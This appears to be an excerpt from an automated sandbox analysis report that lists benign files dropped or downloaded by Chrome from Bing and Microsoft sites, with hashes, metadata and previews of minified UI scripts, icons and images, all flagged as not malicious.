                                                                                                    Preview:(function(){var n,i=(new Date).getTime(),t=_G!==undefined&&_G.RTO!==undefined?_G.RTO:null,r=((n=_G===null||_G===void 0?void 0:_G.EF)===null||n===void 0?void 0:n.infrefcflog)===1;t!=null&&(window.history.scrollRestoration="auto",document.addEventListener("visibilitychange",function(){if(document.visibilityState==="visible"&&window.location.href.indexOf("/search")>=0&&(new Date).getTime()-i>t&&(Log&&Log.Log&&Log.Log("NTRef","DayRefresh","Active"),!r)){var n=window.location.href+(window.location.href.indexOf("dayref=1")<0?"&dayref=1":"");window.location.href=n}}),typeof setTimeout!="undefined"&&setTimeout(function(){Log&&Log.Log&&Log.Log("NTRef","DayRefresh","Inactive")},t))})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (4315), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4315
                                                                                                    Entropy (8bit):5.385732711634534
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:LdH7YGUdnsDWnUR87oc5GIsLAqZUGmnxttvmBvsSGydxyO9rpn:Ld/U6SnUK7T5/gpZUGmxLvmB0SGydxy4
                                                                                                    MD5:B0AA9CA5704348C1B9B358F4B645BB99
                                                                                                    SHA1:D97774355811D2FEC080434B0E5D3B301051F0D0
                                                                                                    SHA-256:EEC8F864735CC255153EB3B5666A0AC7E30DD9CCEE5643ADF111AF8F4D5C488F
                                                                                                    SHA-512:9C697D00FE1C5F97196CE031A451FB6444E3189C23BE3BA7A1F9E8F0111361460366D9E415E1EFFE24325DF201AD1E7A59502785CFB93272BB4DAC6F2992FA5B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var BrandingNav=function(){function n(n){this.render(n)}return n.prototype.startCarousel=function(n){var i=document.getElementsByClassName("nav-item"),t=1,r;n.length>1&&(r=setInterval(function(){i[t].className="nav-item nav-item-fade-out";t=(t+1)%i.length;i[t].className="nav-item nav-item-fade-in"},8e3))},n.prototype.renderButton=function(n,t){var u=document.createElement("div"),i,r,f;return u.className="b_branding-nav-btn-container",i=document.createElement("div"),i.className="b_branding-nav-btn-text-container",i.innerText=t+": ",r=document.createElement("a"),f="www."+n,r.innerText=f,r.href="https://"+f,r.target="_blank",i.appendChild(r),sj_be(i,"click",function(n){n.preventDefault()}),u.appendChild(i),sj_be(u,"click",function(){_w.open("https://"+f,"_blank")}),u},n.prototype.renderIconButton=function(n){var t=document.createElement("div"),i;return t.className="b_branding-nav-icon-btn",t.innerHTML='<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/20
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):97741
                                                                                                    Entropy (8bit):5.317413225936828
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:yomI9/afvZtvdKJiT315bQNrkSGQSv921rl1:aI9CfPciD158NrkO1
                                                                                                    MD5:C57CC11A511063B808F4A2C7745DF8D0
                                                                                                    SHA1:CEB6E14B7520A995C7E9C3BB6F3C1DCD56CCB5EE
                                                                                                    SHA-256:65628140B0930C3F9ED1A06A8F30F454245A08665047C6A95B592DFD164F4E9F
                                                                                                    SHA-512:CA8C7FCB456D3819FBA65A5040547D5A169FC5BDA9F1EA8479EA75C0580A57D02DC07525445F9FA7EC0D09CF2F38A6B8F71F297F715A0059AB8786D5D85BF948
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:(()=>{"use strict";var e={},n={};function t(r){var i=n[r];if(void 0!==i)return i.exports;var o=n[r]={id:r,loaded:!1,exports:{}};return e[r](o,o.exports,t),o.loaded=!0,o.exports}t.m=e,(()=>{var e,n=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__;t.t=function(r,i){if(1&i&&(r=this(r)),8&i)return r;if("object"==typeof r&&r){if(4&i&&r.__esModule)return r;if(16&i&&"function"==typeof r.then)return r}var o=Object.create(null);t.r(o);var a={};e=e||[null,n({}),n([]),n(n)];for(var u=2&i&&r;"object"==typeof u&&!~e.indexOf(u);u=n(u))Object.getOwnPropertyNames(u).forEach((e=>a[e]=()=>r[e]));return a.default=()=>r,t.d(o,a),o}})(),(()=>{t.d=(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})}})(),(()=>{t.f={},t.e=e=>Promise.all(Object.keys(t.f).reduce(((n,r)=>(t.f[r](e,n),n)),[]))})(),(()=>{t.u=e=>"inline.text-encoder-lite.chunk.js"})(),(()=>{t.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("retur
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1101
                                                                                                    Entropy (8bit):4.829151166001716
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:t0S8eLfl954T0u2y3EO1gRcDrIvQaDxijjfscC:vLfRWtPDuQKIjq
                                                                                                    MD5:91CD11CFCCA65CFACE96153268D71F63
                                                                                                    SHA1:E0BE107728D3BF41D8136220DA897D798A2AC60F
                                                                                                    SHA-256:8EE1E6D7A487C38412D7B375AC4A6BD7E47F70858055EEB7957226ADA05544BE
                                                                                                    SHA-512:4367CE147C7FA4590838F23C47819B8954858128336979E28BA116924B92660A7CBDC9A8292C45C5F26FF591F423F03DFADCB78A772DBE86AC5FBABF0B4E7711
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:<svg focusable="false" width="24px" height="24px" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <rect fill-opacity="0.2" fill="#000" x="0" y="0" width="24" height="24" rx="2"></rect>.. <g transform="translate(4, 4)">.. <path d="M13.2916881,1.29304814 L7.99395739,6.59077883 L2.69622669,1.29304814 C2.30349711,0.913737214 1.67923378,0.919161894 1.29315522,1.30524045 C0.907076669,1.691319 0.90165199,2.31558234 1.28096291,2.70831192 L6.57869361,8.00604261 L1.28096291,13.3037733 C0.90165199,13.6965029 0.907076669,14.3207662 1.29315522,14.7068448 C1.67923378,15.0929233 2.30349711,15.098348 2.69622669,14.7190371 L7.99395739,9.42130639 L13.2916881,14.7190371 C13.6844177,15.098348 14.308681,15.0929233 14.6947596,14.7068448 C15.0808381,14.3207662 15.0862628,13.6965029 14.7069519,13.3037733 L9.40922117,8.00604261 L14.7069519,2.70831192 C15.0976827,2.31746305 15.0976827,1.683897 14.7069519,1.29304814 C14.316103,0.902317288 13
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 86 x 12, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1272
                                                                                                    Entropy (8bit):7.739655473272039
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:B8w+N44kvN+26z6C662MSVta3R/9Cwu7a548Zs0MpybNCz:p+8vAq5UBowvS8Zs0Mpybwz
                                                                                                    MD5:AE5C74DAFC9C8E750A0C011A0A0C58D1
                                                                                                    SHA1:12ABB814204FC5A6E5130A97EAB94C490A19829C
                                                                                                    SHA-256:D62972B8E0BAB842794D2E274D42922D5912AE160071584681AA6367B6956421
                                                                                                    SHA-512:A755E42CB8DC14C4DE09CC27A56CB55F2232EC280C668DCF41DC128D7F6C3534B9D0ADBE5A905BF8A6C62D97E2A10DA33136BBADC044B09A3153109B93C6B5CB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=OJ.GKZmY0amzTOhAQ&pid=news&w=86&h=12&rs=2
                                                                                                    Preview:.PNG........IHDR...V..........CJf....sRGB.........gAMA......a.....pHYs..........o.d....IDATXG..w.os...s.}......"%...WvD.!.P.0.e..R.G.B..Y...9....w].......w...w.w<..y.i..~..)i...=7........m.*[._..m...g.....V./..N..1D..5..?.01....'...|...vt.1..........V...3.....t.f.pT0.a.@+.s..Vf......0.......N.......S..g..~ ..c.pP8<.......:..9a.0g.;...7..>........tI....U..`!...u..{........g...`b...l...wv..`,..y..n.1..~.6.P.&........0.....w.,...Gx?..@..2.>.....zcp8...s.`d."|..Y.bp.tq.56....h.}....^.Y.ca..4.....Bx<..D..Av<.Fuw..%.^...T.p.M/...........I...@.....~.W..o.-.^........ .;..f..x/...a.....v...)T........s.G... ]..O......N.I..D0.G{f. J./.H.X..s..0.=.P......E..G....F.X...R....K..wm .8tl...#%N..^.......a.x.... .-.)..*b-.D...A..Ni.&Y.G.q.-.C uS&..G.C.7X...X.I.s...4..?.c..,.X.$9....vHl..]0.}.....@J.{....~.quU_f+g.!......+.}.........Zc...(..w.VJ.....:q..Y...[...O0D..A.X5R..8Vts.....M.x.i.z.@[...NQK......$..*C..F.{n...J.L.._.u.)!M..Rw......t.<NW..D.].n.J...
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                    Category:dropped
                                                                                                    Size (bytes):726
                                                                                                    Entropy (8bit):4.636787858533541
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:tbH41nlcWYiB1+Xl0ML2t1iOfEmmgaUEUZQ6nMAIPWSxs4yPISEIe9t8aayPISEx:t741nTYifqLL2+O7mgaxSQ6MFnE3nkO
                                                                                                    MD5:6601E4A25AB847203E1015B32514B16C
                                                                                                    SHA1:282FE75F6FED3CFC85BD5C3544ADB462ED45C839
                                                                                                    SHA-256:6E5D3FFF70EEC85FF6D42C84062076688CB092A3D605F47260DBBE6B3B836B21
                                                                                                    SHA-512:305C325EAD714D7BCBD25F3ACED4D7B6AED6AE58D7D4C2F2DFFCE3DFDEB0F427EC812639AD50708EA08BC79E4FAD8AC2D9562B142E0808936053715938638B7C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" enable-background="new 0 0 16 16">.. <path d="M0 0h16v16h-16v-16z" fill="none"/>.. <path fill="#007DAA" d="M11 4h4l-5-4v3c0 .552.447 1 1 1zm-3-1v-3h-4.5c-.828 0-1.5.672-1.5 1.5v13c0 .828.672 1.5 1.5 1.5h10c.828 0 1.5-.672 1.5-1.5v-8.5h-4c-1.654 0-3-1.346-3-3zm4.707 10.707c-.181.181-.431.293-.707.293h-7c-.276 0-.526-.112-.707-.293s-.293-.431-.293-.707.112-.526.293-.707.431-.293.707-.293h7c.276 0 .526.112.707.293s.293.431.293.707-.112.526-.293.707zm0-5.414c.181.181.293.431.293.707s-.112.526-.293.707-.431.293-.707.293h-7c-.276 0-.526-.112-.707-.293s-.293-.431-.293-.707.112-.526.293-.707.431-.293.707-.293h7c.276 0 .526.112.707.293z"/>..</svg>
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 80x80, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):4177
                                                                                                    Entropy (8bit):7.891831987954031
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:TMEun138Oobhu1m+VfJc2d3uTjypzwY/vmZIwhmRMngD8HBuOrALxD:QV7ew1P5PMcnvm+ZMngYHBuOSD
                                                                                                    MD5:196C07381A93FA0FC2032B513AA437BB
                                                                                                    SHA1:81FEFE30FC703B6CFA04F075B154FE38D71D316E
                                                                                                    SHA-256:3629459B70D617E16888A6F4A33398AFA669A0373C3DD1C04A73346E85F36BB5
                                                                                                    SHA-512:2CF6F747C37C6E9AF4640FCD118EC39C751998CDF95A83756476EECE8FC35B0733E3D0D61660C4790F22C63706CC451FC1921FC650BF0778BDEBE3C58486BD12
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.bing.com/th?id=OVFT.bsHZvTc0qDt7kbpUrjQify&pid=News&w=80&h=80&c=14&rs=2&qlt=90
                                                                                                    Preview:......JFIF.....`.`.....C....................................................................C.......................................................................P.P.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..<'...6p.j?..u. ..J.....;r.......q. ..:W..'..>.I4....&.#...+....,.....l0nrs.......?.-......CH5+....lr.O^.q.V...+|...V{?......]....T......;NO.b..Q.b...B......?mo....M..).4.....k.s.^^.Ze...>Z......W9.~.?.5Gc./.k......x..>....vA.s....2y.5.7.....s5..x5m..6.....*..,............^.....V.<L....=F.5W...WL'R..Z...._.b.i.~..~.u.h~.?..-.[.w.4>..A..+.oqc=..B"...ePyh.......>..#.5
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (30635)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):30687
                                                                                                    Entropy (8bit):5.2769084538455076
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:42P2k0SMB/2ZsJIjrAWJdvgmfQFc6mjVqMP62A86uIz3yR:4Ih0S0/ks2JdImYFcw662A86vzyR
                                                                                                    MD5:1CCE752051FC076EB20177DC6AAF712F
                                                                                                    SHA1:0045AB728A9B8869223D9E6EBB8DA9A3A5A88941
                                                                                                    SHA-256:0E7F3BBE4003CFF6D1EEA624AAF8B3F6BCB36E7F6019D5DA88C21B42421180BD
                                                                                                    SHA-512:6A6ABAA0C515550E8FD0B08DB34FE3955033240F2AF4255838CDEE2EF4307EBBBED1E1A45CB73AC218117B58A1CD9DFBC77F8A27196586F8DB1C1DF88FB7A0A8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.24228.4","mkt":"en-US","ptn":"office","gfx":"https://amcdn.msftauth.net","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedScenario","instKey":"b8ffe739c47a401190627519795ca4d2-044a8309-9d4b-430b-9d47-6e87775cbab6-6888","oneDSUrl":"https://js.monitor.azure.com/scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js","remAcc":true,"main":"meBoot","wrapperId":"uhf","cdnRegex":"^(?:https?:\\/\\/)?(mem\\.gfx\\.ms(?!\\.)|controls\\.account.microsoft?(?:-int|-dev)?(\\.com)?(:[0-9]{1,6})|amcdn\\.ms(?:ft)?auth\\.net(?!\\.))","timeoutMs":30000,"graphv2":true,"graphinfo":{"graphclientid":"7eadcef8-456d-4611-9480-4fff72b8b9e2","graphscope":"user.read","graphcodeurl":"https://login.microsoftonline.com/common/oauth2/v2.0/authorize","graphredirecturi":"https://amcdn.msftauth.ne
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1699 x 1181, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):793073
                                                                                                    Entropy (8bit):7.9926326015445595
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:12288:zzR6wui4acRTYbntjQHv/6/nIz78wWDgqzMv0RxvAL+YopRvJl9JsG4VF5Rq5:zzRe+cRTY7+HKKASMRO+X3RJsGeg
                                                                                                    MD5:979FF0DCE1EDA2035552AD1AA4EFACFA
                                                                                                    SHA1:5765B464F4C94028C4D7492159E2B584DDE8E357
                                                                                                    SHA-256:5979E07897CC0115AC1F320D880B419BF59185B8E6C7BCC75011784E90EA1FEF
                                                                                                    SHA-512:623737D9A6493C87C6EE0765A8880AB3E1C1A67E674C3B4AA908049DE34CBC3D1A899BA1B6C644B881490453DD9067953F3AD00E5E335F872E5CB1AE30EEC244
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR...............&.....pHYs.................sRGB.........gAMA......a.....IDATx...Y.ui~..k.............l..H....K.`.T...!..Yv.... .$... ... 7....A`...A,..e....bsR.U.Mg..Z+..<.w.]...Uu.2).......^k....L..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 80x80, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1893
                                                                                                    Entropy (8bit):7.657822313014533
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ZokWiesoiQ+jWVA7QSMZW71TjnV7zLCziDTmpihTKRBsh7Xj4HzhIEtz6asmMaQx:ZoTsCVAURkvpCWPm2tMzhVtz6asmtW1
                                                                                                    MD5:0116F0FE3EDF5B6C93811615A3D151AD
                                                                                                    SHA1:4032664FA7BD21E3F95165E039168D49D0117F2C
                                                                                                    SHA-256:AE2C9DD42F670985B5B76DF08A1DCA3969F377D2E4E4ED4045B6A8B51E7F0BCB
                                                                                                    SHA-512:227CC728D495724FABE9089EEA6FA3BF156DF1340C23899999CB76AD779FA854895CFA6708DC5D0221460F57861B0BA814A9E38FA9626FFC96FC8D8974EB67ED
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=OIP.heaY1yVSqIEWPZETaQDyPwAAAA&w=80&h=80&c=1&vt=10&bgcl=3d22d8&r=0&o=6&pid=5.1
                                                                                                    Preview:......JFIF...................................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............P.P.."..................................................p\...&._....O.>.F+.~}.u......'.....Zhz.).R..QS.e]Bn$.k....I...Q..T..y..........................................5.*9t.{.M...sC.9..O...F.........................!..1A.T..."6U.......#2QRat.$BCq...%4Ss.............?.q....s.q(...7.#....G}o..p.....~...7.[...,.....<.g.....a..?ho....8Y.C}..Xy............}m......B.H..-..Nt4.&b@.cz..j. .....;.5..ug{5..ug;5..uw;5..uw;5..uw;5......[{.M....+b0;.....<..]......)..-.Z...OGH..$...h.n..B...4"...1..u...f.3.7.......;.~.;...Q.-(..s.A...P.*.. ....);.........2{.6^...{.:$.........~.|.....XT'|x*.yP.P..N.]l.TS.....O".P3.i.a..[a..*%d.A.&..^yj..J`.2O..8R.^iC.f.@..O..!H)...Fee.9M....!.H........r...22.Q..JH....[\.|S......q........cX6...k.R.....U.....0....}..-(.?Q.F.6....N............0...?.G..m3h.Xk.....i.c.3pu...m#YT
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (14334), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14334
                                                                                                    Entropy (8bit):5.214511072778415
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:4j2fQmlfpG3olyemLINsiBp+t9o8dQUwLgq:4j2omTq9/INsie9o8GRLD
                                                                                                    MD5:6DEB575ED015BA9F359671380474EF88
                                                                                                    SHA1:0F8F36FA0B0CBC56FA091DBD60D918A0C1F2C99A
                                                                                                    SHA-256:F015ED4A8BF649FBE3333F1B9E3214AB9CD495BBDD6387812ED79039F2DDD394
                                                                                                    SHA-512:D3ACE5A16CBA1245128B38EF256EC2420A44C929830540DCE0F8539FF45DCF833257A82F132C4316D9ACFA907823741AE4146A67C99242B0EE1B1EC9471E40E8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var tabcontrol;(function(n){function ot(){return n.tabErrorMsg}function st(t){n.tabErrorMsg=t}function w(){return n.tabs||(n.tabs=[]),n.tabs}function ht(){n.tabs=[]}function k(n){n&&!ct(n)&&Lib.CssClass.add(n,"tab-disable")}function d(n){n&&Lib.CssClass.remove(n,"tab-disable")}function g(n){return Lib.CssClass.contains(n,"tab-active")}function ct(n){return n&&Lib.CssClass.contains(n,"tab-disable")}function f(n){return _ge(t(n,"content"))}function r(n){return t(n,"appns")}function u(n){return t(n,"k")}function t(n,t,i){if(i===void 0&&(i=null),!n)return null;var r="data-"+t;return i===null?n.getAttribute(r):(n.setAttribute(r,i),i)}function e(n,i){return i===void 0&&(i=null),i===null?parseInt(t(n,v),10):(t(n,v,i.toString()),i)}function lt(n,t,i){i===void 0&&(i=null);t.style.opacity="0";sb_st(function(){Lib.CssClass.add(t,"tab-hide");n.style.opacity="1";Lib.CssClass.remove(n,"tab-hide");i&&i()},0);Log.Log("Show","Tab","TabControl",!1,"AppNS",r(n),"K",u(n),"Category","CommonControls");Log.L
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1017 x 706, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):372407
                                                                                                    Entropy (8bit):7.9920868023509675
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:6144:Qua8gWRQXRaGDBt/Qc8ABKmSzu/8YbOHPiyjcXLVzXDJImOdeEd0YufcqoTU3Xw1:QuaW0bL/QcdBaxjc7xXDOmOdee0DcqU/
                                                                                                    MD5:1B4C66938347FF70F6D2FA1173D0C09B
                                                                                                    SHA1:8766438A8E7EE0E068BABA0042B0D97C7667CAE4
                                                                                                    SHA-256:B59D05AA36BA301347E8E8D711A42452E925F6875ACE1409B056AD2B759C9317
                                                                                                    SHA-512:C9C2733F7C0DCA56B13E9F08CFFCFE0BD836F97D4D8B28EA1BA57896B9B2342A570D1653059BDED922024C10F8842C85504BAFD650CABA52C9DBF380078CBDF7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-consumer-4-mreb-1b4c669383.png
                                                                                                    Preview:.PNG........IHDR.....................pHYs.........&.:4....sRGB.........gAMA......a....LIDATx..[.m[r.V5.\..o.....O...>}w..6.` ..lC0.....F..@..(..<.C.).....!..)....<$J"E....D...0...M.}.n.....9*sT.WUs..6....Q...Zk.9..5... .4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I..^b.4.7.q....W........F.mL.~.G..Q..$.X...............,..q.w...W..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:51:08], progressive, precision 8, 160x158, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):4547
                                                                                                    Entropy (8bit):7.735536921390623
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ssb41dk9JozAQ8d2SuBK76KrZDoDBtnFKiDo8TzNnNJSHvLPS:sj1eozAQ8d2VPGoBBFfM4fJSHDPS
                                                                                                    MD5:7AEF4CCF6E47B9BA038365CD3D1F5693
                                                                                                    SHA1:71F7957F6FAE574854A374E84DB2E3CEDBA89969
                                                                                                    SHA-256:08102BA7A0388B1AFC9A351B3387B2DDEDA846551303170E0273B2F305AECCB2
                                                                                                    SHA-512:29AC1E6BADF62C61B4FA889EA1B0436D3B9107A60BA03801DFA8E23A4D8BCCF42C09BB7CC7E6CD9FACB8D140DB7E0D4F0EEB3D7D8A3B9B38B1D2B95113005320
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/cfeVf2-uV0hUo3ToTbLjztuomWk.jpg
                                                                                                    Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:51:08....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;...........................................................................................VQJ,..R...)..(..R..d.Y@...h..%(.AW(T.)...5.,.%.2[.."*!l...Z......@I..T.......@3.@....D@ ..l.)E.P....ts......@... E".W/G...........IQ..I|../.,..W..(....WY.1<.t..=....K...C....-.1..s.[l...^].mO7|..:.kda5....o.=.S.8.;....~e,.......1v..~5.:s'$..u.i..k.7._E25...f6v..Nk.&)....S.r...ovn5...k9k...u.D...f&.......e.+.7......d..7K.R]..f..K..l...r...*.K.b..s29...y;..U.E(.qH....,....QS%..@....'......................... !."1.#$0@.`............R.J..e~...+.J.....y..7#..^....,.....@.3..`.....L...[u.!.../...*;[7.,...a....[._W...B;.....4g+../c..>g...!..U..Q...0...$..F%...u|.2?.V.>.v..2.2.S.c..km)
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):289
                                                                                                    Entropy (8bit):4.88926455834166
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:2LGXO86zKFddXQOa65Em/L6I38TcqLcUCPrWqpOlZXzPlg3X6:2QO8vzdXmMPTiAiXzC3X6
                                                                                                    MD5:9085E17B6172D9FC7B7373762C3D6E74
                                                                                                    SHA1:DAB3CA26EC7A8426F034113AFA2123EDFAA32A76
                                                                                                    SHA-256:586D8F94486A8116AF00C80A255CBA96C5D994C5864E47DEAC5A7F1AE1E24B0D
                                                                                                    SHA-512:B27B776CB4947EEF6D9E2A33B46E87796A6D4C427F4759C08CF5AA0EE410A5F12E89CA6AB9CDDD86C8471037E3C505F43C8B7FC6D8417F97F9FE3C5C47216BC4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/2rPKJux6hCbwNBE6-iEj7fqjKnY.js
                                                                                                    Preview:(function(){if("BroadcastChannel"in window){var t=1,n=new BroadcastChannel("tabCountBroadCastChannel");n.onmessage=function(i){i.data=="newTab"&&n.postMessage("existingTab");i.data=="existingTab"&&t++};n.postMessage("newTab");sb_st(function(){Log.Log("Tab","count",t.toString())},200)}})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (4421), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):4421
                                                                                                    Entropy (8bit):5.3588731850270666
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:E5WidfoUnKeG4DFKFnnQwiJUKhXLGajU/tx6:fidfLdG4DFKFQwiCKhXLGajU/a
                                                                                                    MD5:C0DFFF741E6461BE535E7A402634E9D0
                                                                                                    SHA1:998B44EF05CBEC6605E88CDEEF3354CBCF9A566C
                                                                                                    SHA-256:A29707E768A53201E2AB26D83E5746E6F22E1C573743A66C50B7E5D19F6B531E
                                                                                                    SHA-512:BCD06CBD6A785AAF21946382FBF4E09DFE47E3FA50C3210090BC646266499A915DF98B811D4EAED9083400E844CCCCF7F1A78C1D0FAAE570D265793AEDA20195
                                                                                                    Malicious:false
                                                                                                    Reputation:low
